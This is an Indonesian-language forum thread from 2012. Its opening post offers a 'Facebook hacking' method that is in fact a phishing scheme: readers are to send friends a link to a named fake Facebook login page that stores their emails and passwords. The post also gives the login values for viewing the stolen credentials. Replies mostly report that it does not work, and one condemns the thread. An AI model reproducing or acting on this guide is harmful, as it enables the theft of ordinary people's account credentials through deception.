;

Welcome, Guest. Please login or register.
Did you miss your activation email?

Username: Password:
Pages: [1] 2 3   Go Down

Author Topic: Cara Hacking Facebook 2012!! 100% berhasil  (Read 20146 times)

kizarusan

  • Cabin Crew
  • *
  • Keong: 0
  • Offline Offline
  • Posts: 12
Cara Hacking Facebook 2012!! 100% berhasil
« on: March 28, 2012, 09:36:26 PM »

Maaf sebelumnya. gw cm mw share cara hacking FB terbaru. Trik yg akan gw kasi sudah terbukti ampuh dan berhasil menjebak banyak orang.

Berikut ini caranya :

Bagikan link ini ke temanmu di Facebook yang ingin kamu hack Facebooknya.
Quote
http://fadebookerz.horizon-host.com
atau
Quote
http://fadebookerz.horizon-host.com/login.php
Setelah mengklik link tadi teman anda akan dibawa ke website yang tampilannya persis sekali dengan Facebook.



Setelah temanmu mengisi email dan password nya, maka data yang tadi dimasukkan akan dimasukkan ke dalam database dan tidak ada yang dapat menghapusnya.
Setelah menekan tombol login teman anda akan dibawa ke halaman Facebook yang seolah-olah menunjukkan kalau teman anda salah login.






Untuk melihat email dan password yang ada dalam Database web palsu tadi anda dapat mengisi Email dan Passwordnya dengan =
Quote
Email :nasiputih
Password:telurgoreng


Tekan tombol login kemudian semua data email dan password yang dimasukkan teman anda akan terlihat disana.

[spoiler=EmailDanPassword]

[/spoiler]
Ini adalah trik yang terbukti ampuh dan sangat mudah dipraktekkan bahkan untuk anak umur 5 tahun sekalipun. SELAMAT MENCOBA…^^

Jika ada yang kurang jelas atau linknya tidak berfungsi agan2 sekalian dapat memberitau ane.. ^^
« Last Edit: April 21, 2012, 09:35:44 PM by kizarusan »
Logged

bagus wira

  • Senior Sailor
  • ******
  • Keong: -3
  • Offline Offline
  • Posts: 29276
  • Alhamdulillah :)
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #1 on: March 31, 2012, 12:45:20 AM »


Untuk melihat email dan password yang ada dalam Database web palsu tadi anda dapat mengisi Email dan Passwordnya dengan =

Ini mksdnya gimana ya? Masih agak bingung dg kalimat ini, mohon pencerahanya [hmpfh]
Logged

k-nan

  • Senior Sailor
  • ******
  • Keong: -2
  • Offline Offline
  • Posts: 34624
  • Kangen Kaka :(
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #2 on: March 31, 2012, 09:11:02 AM »

Wahh bejat nih tret -_-
Logged
Nggak pasang siggy dulu ckckck

kizarusan

  • Cabin Crew
  • *
  • Keong: 0
  • Offline Offline
  • Posts: 12
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #3 on: March 31, 2012, 11:53:05 AM »


Untuk melihat email dan password yang ada dalam Database web palsu tadi anda dapat mengisi Email dan Passwordnya dengan =

Ini mksdnya gimana ya? Masih agak bingung dg kalimat ini, mohon pencerahanya [hmpfh]

maksudnya di FB palsu tadi, emailnya diisi nasiputih dan passwordnya diisi telurgoreng
Logged

Sc0rp10ntX_DK

  • Forum Machi
  • ***
  • Keong: 0
  • Offline Offline
  • Posts: 2097
  • i'll be back when you call my name~
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #4 on: April 02, 2012, 04:19:52 PM »

masih lemah... [hmpfh]
Logged

Mewylve

  • Tomodachi
  • ****
  • Keong: 0
  • Offline Offline
  • Posts: 3884
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #5 on: April 18, 2012, 08:05:58 PM »

Serius neh?

Pengen nyoba ah... [hmpfh][hmpfh]
Logged
Frm Machi (6/4/09|13/6/10) | Tomodachi (15/2/11)
http://www.lautanindonesia.com/blog/mewylve

bagus wira

  • Senior Sailor
  • ******
  • Keong: -3
  • Offline Offline
  • Posts: 29276
  • Alhamdulillah :)
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #6 on: April 19, 2012, 01:37:23 AM »

Udah gue coba gan, tapi kok gak bisa yah [hmpfh]
Emng harus kalau hacking fb harus dikomputer yang sama ya gan?
Logged

MissAzalea

  • Senior Sailor
  • ******
  • Keong: 2
  • Offline Offline
  • Posts: 19164
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #7 on: April 19, 2012, 09:12:51 PM »

KOQ GAK BISA YA
Logged

Sc0rp10ntX_DK

  • Forum Machi
  • ***
  • Keong: 0
  • Offline Offline
  • Posts: 2097
  • i'll be back when you call my name~
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #8 on: April 19, 2012, 09:28:34 PM »

TSnya sok tau nih...


BEDAKAN ANTARA HACK DAN CRACK.. [hip]
Logged

bagus wira

  • Senior Sailor
  • ******
  • Keong: -3
  • Offline Offline
  • Posts: 29276
  • Alhamdulillah :)
Re: Cara Hacking Facebook 2012!! 100% berhasil
« Reply #9 on: April 19, 2012, 11:33:36 PM »

TSnya kemana sih? Butuh penjelasan nih [rollingeyes]
Logged
Pages: [1] 2 3   Go Up